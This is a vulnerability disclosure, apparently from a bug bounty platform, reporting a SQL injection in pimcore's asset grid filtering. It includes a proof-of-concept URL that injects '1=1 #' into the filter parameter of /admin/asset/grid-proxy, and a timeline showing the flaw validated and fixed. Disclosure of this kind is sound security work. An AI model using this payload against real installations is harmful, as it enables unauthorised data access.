SQL injection in GridHelperService.php in pimcore/pimcore

Valid

Reported on

Apr 13th 2022

Description

In line 786, we can see $conditionFilters[] = $filterField . ' ' . $operator . ' ' . $value;. The three variables joins to a string, and the variables come from the request parameter.(Maybe line 793 is vulnerable too). The code comes from prepareAssetListingForGrid function. The function is called in AssetController.php and AssetHelperController.php, it leads sqlis in three apis. /grid-proxy /get-export-jobs /get-batch-jobs

Proof of Concept

/grid-proxy

https://10.x-dev.pimcore.fun/admin/asset/grid-proxy?xaction=read&_dc=1649852297759&folderId=1&fields%5B%5D=preview~system&fields%5B%5D=id~system&fields%5B%5D=type~system&fields%5B%5D=fullpath~system&fields%5B%5D=filename~system&fields%5B%5D=creationDate~system&fields%5B%5D=modificationDate~system&fields%5B%5D=size~system&language=&only_direct_children=false&only_unreferenced=false&considerChildTags=0&page=1&start=0&limit=25&filter="+encodeURIComponent('[{"property":"1=1 # ~system","type":"string","value":"1","operator":"="}]')

Asset->click home->click list .you will see the api being called. If you give a wrong value, you will see a error. image-20220413202855054 the error log. image-20220413202943005

image-20220413203120906

the api /get-export-jobs and /get-batch-jobs have the similar inject point.

Impact

This vulnerability is capable of steal the data

We are processing your report and will contact the pimcore team within 24 hours. a year ago
pimcore/pimcore maintainer has acknowledged this report a year ago
We have contacted a member of the pimcore team and are waiting to hear back a year ago
Bernhard Rusch validated this vulnerability a year ago
mylong has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch marked this as fixed in 10.3.6 with commit 523a73 a year ago
Bernhard Rusch has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation